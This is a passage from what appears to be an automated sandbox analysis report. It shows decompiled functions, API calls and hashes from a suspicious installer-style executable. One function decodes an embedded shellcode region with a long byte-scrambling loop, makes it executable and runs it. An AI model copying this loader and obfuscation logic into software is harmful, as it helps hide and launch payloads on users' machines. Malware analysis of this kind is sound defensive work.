                • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF86355, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                Download Yara Rule
                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 6FF86499
                • GetThreadContext.KERNELBASE(?,00010007), ref: 6FF864BC
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ContextCreateProcessThread
                • String ID: D
                • API String ID: 2843130473-2746444292
                • Opcode ID: 967b0ed0b159f7095b4aee75cd24dcf2308fc0388ad5ca128b708bfd307461cf
                • Instruction ID: a6af290f3ef0cbee9f56d0f7705cb67fbf97aec50f8ccd2cf053d0318e821e26
                • Opcode Fuzzy Hash: 967b0ed0b159f7095b4aee75cd24dcf2308fc0388ad5ca128b708bfd307461cf
                • Instruction Fuzzy Hash: D2A1E571E54209EFDB40DFA8C980BAEBBB5BF09314F104465E526EB290E771AE81CF14
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405EBA, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405EBA(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                0x00405ed1
                0x00405eda
                0x00405edc
                0x00405edc
                0x00405ee0
                0x00405ef2
                0x00405eec
                0x00405eec
                0x00405eec
                0x00405ef6
                0x00405f0a
                0x00405f1e
                0x00405f25

                APIs
                • GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                • wsprintfA.USER32 ref: 00405F0A
                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: DirectoryLibraryLoadSystemwsprintf
                • String ID: %s%s.dll$UXTHEME$\
                • API String ID: 2200240437-4240819195
                • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040589E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040589E(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                0x004058a2
                0x004058a8
                0x004058a9
                0x004058a9
                0x004058aa
                0x004058b1
                0x004058bb
                0x004058c8
                0x004058cb
                0x004058d3
                0x00000000
                0x00000000
                0x004058d7
                0x00000000
                0x00000000
                0x004058d9
                0x00000000
                0x004058d9
                0x00000000

                APIs
                • GetTickCount.KERNEL32 ref: 004058B1
                • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058CB
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CountFileNameTempTick
                • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop\RHK098760045678009000.exe 0$nsa
                • API String ID: 1716503409-1001418293
                • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF850D8, Relevance: 7.8, APIs: 5, Instructions: 274fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FF85B65
                Memory Dump Source
                • Source File: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 382459803fe3f09374551e91f27c8c37053ede0e81a9b585021e918ee3f8853d
                • Instruction ID: 46320f58fad21e60f9fa573cf4e1432c4d033ccb93c1fedba2f16b06173cc0a7
                • Opcode Fuzzy Hash: 382459803fe3f09374551e91f27c8c37053ede0e81a9b585021e918ee3f8853d
                • Instruction Fuzzy Hash: 42A1E025E54348EADB60CBE8EC11BBDB7B5AF48B10F20545BE519EE2E0D7710E90DB09
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF83070, Relevance: 6.2, APIs: 4, Instructions: 176memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E6FF83070() {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				long _v20;
				void* _t117;

				_v16 = _v16 & 0x00000000;
				_t117 = RtlAllocateHeap(GetProcessHeap(), 1, 0xbebc200); // executed
				_v16 = _t117;
				if(_v16 != 0) {
					memset(_v16, 0xde, 0xbebc200);
					_v12 = _v12 & 0x00000000;
					_v12 = _v12 & 0x00000000;
					while(_v12 < 0x1547) {
						_t14 =  &E6FF850D8 + _v12; // 0x0
						_v5 =  *_t14;
						_v5 = _v5 & 0x000000ff ^ 0x00000071;
						_v5 = (_v5 & 0x000000ff) - 8;
						_v5 = _v5 & 0x000000ff ^ 0x00000083;
						_v5 = (_v5 & 0x000000ff) + 0x3b;
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) - 0xcd;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x72;
						_v5 = _v5 & 0x000000ff ^ 0x00000091;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x51;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) - 0xa9;
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x00000078;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x00000034;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0x81;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x47;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - 0xd2;
						 *((char*)( &E6FF850D8 + _v12)) = _v5;
						_v12 = _v12 + 1;
					}
					VirtualProtect( &E6FF850D8, 0x1547, 0x40,  &_v20); // executed
					E6FF850D8(); // executed
				}
				return 0;
			}








                0x6ff83076
                0x6ff83088
                0x6ff8308e
                0x6ff83095
                0x6ff830a8
                0x6ff830b0
                0x6ff830b4
                0x6ff830c1
                0x6ff830d1
                0x6ff830d7
                0x6ff830e1
                0x6ff830eb
                0x6ff830f7
                0x6ff83101
                0x6ff83113
                0x6ff8311f
                0x6ff83128
                0x6ff83132
                0x6ff8313e
                0x6ff83148
                0x6ff83152
                0x6ff83165
                0x6ff8316f
                0x6ff83178
                0x6ff83182
                0x6ff8318c
                0x6ff83196
                0x6ff831a0
                0x6ff831ac
                0x6ff831be
                0x6ff831c8
                0x6ff831d2
                0x6ff831db
                0x6ff831e5
                0x6ff831ef
                0x6ff83202
                0x6ff8320c
                0x6ff83215
                0x6ff8321f
                0x6ff83228
                0x6ff8323a
                0x6ff83244
                0x6ff8324d
                0x6ff83256
                0x6ff83262
                0x6ff8326b
                0x6ff83275
                0x6ff8327e
                0x6ff83287
                0x6ff83293
                0x6ff8329c
                0x6ff830be
                0x6ff830be
                0x6ff832b7
                0x6ff832c2
                0x6ff832c2
                0x6ff832c9

                APIs
                • GetProcessHeap.KERNEL32(00000001,0BEBC200), ref: 6FF83081
                • RtlAllocateHeap.NTDLL(00000000), ref: 6FF83088
                • memset.MSVCRT ref: 6FF830A8
                • VirtualProtect.KERNELBASE(6FF850D8,00001547,00000040,?), ref: 6FF832B7
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Heap$AllocateProcessProtectVirtualmemset
                • String ID:
                • API String ID: 173993298-0
                • Opcode ID: 5642052972007ee492d9421f1dcd89b824b7c3b378085212cfc5056466b03442
                • Instruction ID: 75691ab74c273baf09d7a8214c8cd99d08812dc9f1491c5083dbdc8407a31050
                • Opcode Fuzzy Hash: 5642052972007ee492d9421f1dcd89b824b7c3b378085212cfc5056466b03442
                • Instruction Fuzzy Hash: 21815521C5D2D9ADDB02CBF944157FCBFB05E26112F0845C6E4E5B6283C13A838E9B21
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 60%
                			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423ff8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423fc8 =  *0x423fc8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404E84(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b010, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040358B(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                0x00401f84
                0x00401f84
                0x00401f89
                0x00401f90
                0x0040204c
                0x00402197
                0x00402197
                0x004028be
                0x004028c1
                0x004028cd
                0x004028cd
                0x00401f9f
                0x00401fa9
                0x00401fac
                0x00401fbb
                0x00401fbf
                0x00401fc5
                0x00401fc9
                0x00402045
                0x00000000
                0x00402045
                0x00401fcb
                0x00401fd5
                0x00401fd9
                0x0040201d
                0x00401fdb
                0x00401fde
                0x00401fe1
                0x00402011
                0x00401fe3
                0x00401fe6
                0x00401fef
                0x00401ff1
                0x00401ff1
                0x00401fef
                0x00401fe1
                0x00402025
                0x0040203a
                0x0040203a
                0x00000000
                0x00402025
                0x00401faf
                0x00401fb5
                0x00401fb9
                0x00000000
                0x00000000
                0x00000000

                APIs
                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                  • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                  • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                • String ID:
                • API String ID: 2987980305-0
                • Opcode ID: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                • Opcode Fuzzy Hash: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E004015B3(char __ebx) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040571F(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056B6(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053C3(_t28);
						} else {
							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004053E0(_t38) == 0) {
								goto L5;
							} else {
								_t22 = E00405346(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B98("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                0x004015b3
                0x004015ba
                0x004015bd
                0x004015c2
                0x004015c6
                0x004015c8
                0x004015d0
                0x004015d2
                0x004015d4
                0x004015d8
                0x004015db
                0x004015f3
                0x004015f4
                0x004015dd
                0x004015dd
                0x004015e0
                0x00000000
                0x004015eb
                0x004015ec
                0x004015ec
                0x004015e0
                0x004015fb
                0x00401602
                0x0040160f
                0x0040160f
                0x00401604
                0x00401605
                0x0040160d
                0x00000000
                0x00000000
                0x0040160d
                0x00401602
                0x00401612
                0x00401615
                0x00401617
                0x00401618
                0x004015c8
                0x0040161f
                0x0040164a
                0x00402197
                0x00401621
                0x00401623
                0x0040162e
                0x00401634
                0x0040163c
                0x00401642
                0x00401642
                0x0040163c
                0x004028c1
                0x004028cd

                APIs
                  • Part of subcall function 0040571F: CharNextA.USER32(004054D1,?,00421940,00000000,00405783,00421940,00421940,?,?,?,004054D1,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040572D
                  • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                  • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                  • Part of subcall function 00405346: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                Strings
                • C:\Users\user~1\AppData\Local\Temp, xrefs: 00401629
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                • String ID: C:\Users\user~1\AppData\Local\Temp
                • API String ID: 1892508949-3107243751
                • Opcode ID: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                • Opcode Fuzzy Hash: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406609, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                Download Yara Rule
                C-Code - Quality: 99%
                			E00406609() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406A77))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
